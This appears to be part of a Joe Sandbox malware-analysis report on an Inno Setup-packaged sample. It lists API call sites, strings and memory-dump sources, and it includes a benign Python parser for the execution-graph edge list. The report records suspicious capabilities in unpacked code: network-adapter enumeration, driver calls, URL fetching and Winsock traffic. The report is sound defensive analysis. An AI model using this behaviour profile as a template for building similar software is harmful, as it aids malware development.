                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                • String ID:
                                                                                • API String ID: 4283692357-0
                                                                                Similarity
                                                                                • API ID: ErrorLast$CountSleepTick
                                                                                • String ID:
                                                                                • API String ID: 2227064392-0
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                Similarity
                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                • String ID:
                                                                                • API String ID: 215268677-0
                                                                                APIs
                                                                                • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                • String ID:
                                                                                • API String ID: 2280970139-0
                                                                                APIs
                                                                                • GlobalHandle.KERNEL32 ref: 00406287
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleLockUnlock
                                                                                • String ID:
                                                                                • API String ID: 2167344118-0
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                Strings
                                                                                • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                • API String ID: 3535843008-1938159461
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                Strings
                                                                                • Will not restart Windows automatically., xrefs: 00483176
                                                                                Similarity
                                                                                • API ID: Window$ActiveForeground
                                                                                • String ID: Will not restart Windows automatically.
                                                                                • API String ID: 307657957-4169339592
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID: x?m
                                                                                • API String ID: 296031713-3464419107
                                                                                Strings
                                                                                • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                • API String ID: 0-1974262853
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                Strings
                                                                                • %s\%s_is1, xrefs: 00478E2C
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1598650737
                                                                                • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                                • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMessageSendShell
                                                                                • String ID: open
                                                                                • API String ID: 812272486-2758837156
                                                                                APIs
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                                • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                • String ID: <
                                                                                • API String ID: 893404051-4251816714
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID: )
                                                                                • API String ID: 2227675388-1084416617
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window
                                                                                • String ID: /INITPROCWND=$%x $@
                                                                                • API String ID: 2353593579-4169826103
                                                                                APIs
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocByteCharFreeMultiWide
                                                                                • String ID: NIL Interface Exception$Unknown Method
                                                                                • API String ID: 3952431833-1023667238
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EnumQuery
                                                                                • String ID: Inno Setup: No Icons
                                                                                • API String ID: 1576479698-2016326496
                                                                                APIs
                                                                                  • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                  • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                Strings
                                                                                • Restarting Windows., xrefs: 00497243
                                                                                • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3179053593-4147564754
                                                                                APIs
                                                                                  • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(70020000,004814B7), ref: 0047CD9A
                                                                                  • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                  • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                Strings
                                                                                • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                • String ID: Detected restart. Removing temporary directory.
                                                                                • API String ID: 1717587489-3199836293
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0

                                                                                Execution Graph

                                                                                Execution Coverage: 12.1%
                                                                                Dynamic/Decrypted Code Coverage: 83.9%
                                                                                Signature Coverage: 4%
                                                                                Total number of Nodes: 2000
                                                                                Total number of Limit Nodes: 34
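The execution_graph that Joe Sandbox emits for this section is a whitespace-separated edge list: `<node-id> <address> [label ...]` declares a node (labels are the Win32 or CRT routines the node calls, or notes such as `60 API calls`), and `<id>-><id>` declares a call-flow edge. The parser below is an added example, not part of the report or of Joe Sandbox's tooling. It reads an excerpt of this report's own edge list (the lstrcmpiW stub, the LoadLibraryA/GetProcAddress/GetAdaptersInfo chain and the CreateFileA/DeviceIoControl chain) and answers the triage question the rendered graph answers visually: which Win32 APIs a given function can reach, and at which addresses a given API is invoked. The 5-digit node-id rule, the 6-8 hex-digit address rule and the API-name heuristic are assumptions fitted to this dump, not a documented format.

```python
import re
from collections import defaultdict

# Excerpt of the execution_graph edge list from the Joe Sandbox report above
# (lstrcmpiW stub, GetAdaptersInfo chain, CreateFileA/DeviceIoControl chain).
# Format assumption: "<node-id> <address> [label ...]" declares a node and
# "<id>-><id>" declares a directed edge, all whitespace-separated.
GRAPH_EXCERPT = (
    "18052 40b880 18053 40b95c lstrcmpiW 18052->18053 "
    "18056 2d8f8da LoadLibraryA 18057 2d8f9bd 18056->18057 "
    "18058 2d8f903 GetProcAddress 18056->18058 18059 2d8f9b6 FreeLibrary "
    "18058->18059 18062 2d8f917 18058->18062 18060 2d8f929 GetAdaptersInfo "
    "18060->18062 18061 2d8f9b1 18061->18059 18062->18060 18062->18061 "
    "18064 2d93a8f 18062->18064 "
    "18403 2d8f7d6 CreateFileA 18404 2d8f8d2 18403->18404 18407 2d8f807 "
    "18403->18407 18405 2d8f81f DeviceIoControl 18405->18407 "
    "18406 2d8f8c8 CloseHandle 18406->18404 18407->18405 18407->18406 "
    "18408 2d8f894 GetLastError 18407->18408 "
    "18409 2d93a8f _Allocate 60 API calls 18407->18409 18408->18406 "
    "18408->18407 18409->18407"
)

NODE_ID = re.compile(r"\d{5}")          # assumption: node ids in this dump are 5 digits
ADDRESS = re.compile(r"[0-9a-f]{6,8}")  # assumption: 32-bit code address, lowercase hex
EDGE = re.compile(r"(\d+)->(\d+)")
# Heuristic for exported API names: 1-4 leading capitals then a lowercase letter
# (GetProcAddress, WSASend, SHGetSpecialFolderPathA). A few Win32/Winsock names
# start lowercase, so they are allow-listed explicitly.
API_NAME = re.compile(r"[A-Z]{1,4}[a-z][A-Za-z0-9]*")
LOWERCASE_APIS = {"lstrcmpiW", "htons", "htonl", "select", "shutdown", "send", "recv"}


def parse_graph(text):
    """Return ({node_id: (address, [labels])}, {node_id: set(successor ids)})."""
    nodes, edges = {}, defaultdict(set)
    tokens = text.split()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.fullmatch(tok)
        if m:
            edges[m.group(1)].add(m.group(2))
            i += 1
            continue
        # A node starts with a 5-digit id immediately followed by a hex address;
        # requiring both keeps "60 API calls" from being read as a node id.
        if NODE_ID.fullmatch(tok) and i + 1 < len(tokens) and ADDRESS.fullmatch(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 2
            continue
        if current is None:
            raise ValueError(f"label {tok!r} appears before any node declaration")
        nodes[current][1].append(tok)
        i += 1
    return nodes, edges


def api_names(labels):
    """Keep only label tokens that look like Win32/Winsock API names."""
    return [t for t in labels if API_NAME.fullmatch(t) or t in LOWERCASE_APIS]


def reachable_apis(nodes, edges, start):
    """APIs called at `start` or anywhere reachable from it along the edges (DFS)."""
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(api_names(nodes[n][1]))
        stack.extend(edges.get(n, ()))
    return apis


def nodes_calling(nodes, api):
    """Sorted addresses of every node whose labels name `api`."""
    return sorted(addr for addr, labels in nodes.values() if api in api_names(labels))


if __name__ == "__main__":
    nodes, edges = parse_graph(GRAPH_EXCERPT)
    print(f"{len(nodes)} nodes, {sum(len(v) for v in edges.values())} edges")
    for start in ("18056", "18403"):
        print(f"from {nodes[start][0]}: {sorted(reachable_apis(nodes, edges, start))}")
    print("DeviceIoControl invoked at", nodes_calling(nodes, "DeviceIoControl"))
```

Run against the full edge list, `reachable_apis` from the node at 2d872ab (InternetOpenA) or 2d81ac5 (WSAStartup) gives the network surface of each entry point without reading the diagram, and `nodes_calling(nodes, "GetAdaptersInfo")` shows the same adapter-enumeration routine sitting both in the 0x400000 image and in the code at 0x2d8xxxx.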
                                                                                execution_graph: rendered in the report as an interactive node/edge diagram; the raw edge list is not reproduced here. Win32 API call sites visible in the graph, by region and behaviour (addresses are the node addresses from the graph):
                                                                                • Image at 0x400000, network adapter and driver access: 401a4f CreateFileA, 401a98 DeviceIoControl, 401b0e GetLastError, 401b3a CloseHandle; 401b4b LoadLibraryA, 401b6e GetProcAddress, 401b95 GetAdaptersInfo, 401c18 FreeLibrary
                                                                                • Image at 0x400000, registry: 40b0ca RegOpenKeyExA, 402772 RegQueryValueExA, 40b54b RegSetValueExA, 40bab8 RegCloseKey
                                                                                • Image at 0x400000, files, services and loading: 4027a6 CopyFileA, 4025f9 CreateDirectoryA, 4025f1 LoadLibraryExA, 40226b OpenSCManagerA, 40ba39 VirtualAlloc, 405415 LoadLibraryA with 405426 and 40543d GetProcAddress
                                                                                • Image at 0x400000, resources and timing: 401f64 FindResourceA, 401f86 SizeofResource, 401fa6 LoadResource, LockResource, GlobalAlloc, 401ffb GetTickCount, 402005 GlobalAlloc; 4022af Sleep, 40b8ad GetLocalTime, 40b95c lstrcmpiW
                                                                                • Image at 0x400000, C runtime start-up and teardown (402d60 onward): GetVersion, GetVersionExA, HeapCreate, HeapDestroy, GetStartupInfoA, GetCommandLineA, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentVariableA, GetModuleFileNameA, GetModuleHandleA, GetStdHandle, GetFileType, SetHandleCount, WriteFile, GetCPInfo, GetACP, GetOEMCP, GetStringTypeA, GetStringTypeW, LCMapStringA, LCMapStringW, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, HeapReAlloc, HeapFree, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess
                                                                                • Code at 0x2d8xxxx (outside the 0x400000 image), network adapter and driver access, the same sequences as in the image: 2d8f7d6 CreateFileA, 2d8f81f DeviceIoControl, 2d8f894 GetLastError, 2d8f8c8 CloseHandle; 2d8f8da LoadLibraryA, 2d8f903 GetProcAddress, 2d8f929 GetAdaptersInfo, 2d8f9b6 FreeLibrary
                                                                                • Code at 0x2d8xxxx, WinINet URL fetch: 2d872ab InternetOpenA, 2d872c9 InternetSetOptionA (three calls), 2d87322 InternetOpenUrlA, 2d87346 InternetReadFile, 2d87377 and 2d87382 InternetCloseHandle
                                                                                • Code at 0x2d8xxxx, Winsock: 2d81ac5 WSAStartup, 2d82d39 WSASend, 2d82be2 WSARecv, 2d82cbc and 2d82e54 select, 2d88338 shutdown (each of these nodes first calls WSASetLastError), 2d8a448 WSAGetLastError, 2d83d99 and 2d83dcb htons, 2d83db7 htonl
                                                                                • Code at 0x2d8xxxx, threads, synchronisation, heap and shell: 2d9207d ResumeThread with 2d92076 CloseHandle, 2d83fe6 CreateEventA, 2d864ae RtlInitializeCriticalSection with GetModuleHandleA and GetProcAddress, 2d81aa9 InterlockedIncrement, 2d81ac5 InterlockedExchange, 2d833c4 InterlockedCompareExchange, 2d8403a GetProcessHeap and RtlAllocateHeap, 2d91851 GetProcessHeap and HeapFree, 2d85362 SHGetSpecialFolderPathA
                                                                                • Code at 0x2dbxxxx to 0x2dexxxx, file I/O: 2dbfa26 DeleteFileA, 2dd1738 CreateFileA, 2de990b ReadFile, 2de3b04 WriteFile
                                                                                • Code at 0x2d9xxxx to 0x2daxxxx, C runtime support: 2d94d12, 2d9947e and 2da01f1 IsDebuggerPresent; 2da0202 OutputDebugStringW; 2d99468 SetUnhandledExceptionFilter and UnhandledExceptionFilter; 2d99453 GetCurrentProcess and TerminateProcess; 2d944b9 RaiseException; 2d94e45 IsProcessorFeaturePresent; 2da0141 LoadLibraryExW with 2da017e and 2da01da GetProcAddress, RtlEncodePointer and RtlDecodePointer; 2d98228 GetModuleHandleExW, 2d98253 ExitProcess; 2d986f1 GetModuleFileNameW, 2d987ba GetStdHandle, 2d98801 WriteFile; 2d99169 InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection and RtlLeaveCriticalSection, 2d99122 TlsGetValue, 2d99144 TlsSetValue, 2d95bfc GetCurrentThreadId, 2d95bb2 GetLastError, 2d95c15 SetLastError, 2d99445 Sleep; RtlAllocateHeap, RtlReAllocateHeap, RtlSizeHeap, HeapFree
19291->19226 19293 2d84005 19292->19293 19294 2d8a5be Mailbox 60 API calls 19293->19294 19294->19291 19296 2d840c1 19295->19296 19297 2d8b03f 19295->19297 19296->19287 19298 2d93a8f _Allocate 60 API calls 19297->19298 19299 2d8b04f std::exception::exception 19297->19299 19298->19299 19299->19296 19300 2d9449a __CxxThrowException@8 RaiseException 19299->19300 19301 2d8fa64 19300->19301 19302->19289 19304 2d9330a 19303->19304 19305 2d9331e 19303->19305 19306 2d95d9b __set_osfhnd 59 API calls 19304->19306 19307 2d989ac __calloc_crt 59 API calls 19305->19307 19309 2d9330f 19306->19309 19308 2d9332b 19307->19308 19310 2d9337c 19308->19310 19322 2d95b9a 19308->19322 19311 2d94e35 __fclose_nolock 9 API calls 19309->19311 19313 2d92eb4 _free 59 API calls 19310->19313 19317 2d9204b 19311->19317 19315 2d93382 19313->19315 19315->19317 19327 2d95d7a 19315->19327 19316 2d95c21 __initptd 59 API calls 19318 2d93341 CreateThread 19316->19318 19317->19205 19317->19206 19317->19207 19318->19317 19321 2d93374 GetLastError 19318->19321 19335 2d9345c 19318->19335 19321->19310 19323 2d95bb2 __getptd_noexit 59 API calls 19322->19323 19324 2d95ba0 19323->19324 19325 2d93338 19324->19325 19326 2d9837f __amsg_exit 59 API calls 19324->19326 19325->19316 19326->19325 19332 2d95d67 19327->19332 19329 2d95d83 __dosmaperr 19330 2d95d9b __set_osfhnd 59 API calls 19329->19330 19331 2d95d96 19330->19331 19331->19317 19333 2d95bb2 __getptd_noexit 59 API calls 19332->19333 19334 2d95d6c 19333->19334 19334->19329 19336 2d93465 __threadstartex@4 19335->19336 19337 2d9910b __freeptd TlsGetValue 19336->19337 19338 2d9346b 19337->19338 19339 2d9349e 19338->19339 19340 2d93472 __threadstartex@4 19338->19340 19367 2d95a2f 19339->19367 19342 2d9912a __freeptd TlsSetValue 19340->19342 19343 2d93481 19342->19343 19346 2d93494 GetCurrentThreadId 19343->19346 19347 2d93487 GetLastError RtlExitUserThread 19343->19347 19344 2d934b9 ___crtIsPackagedApp 19345 2d934cd 19344->19345 19351 2d93404 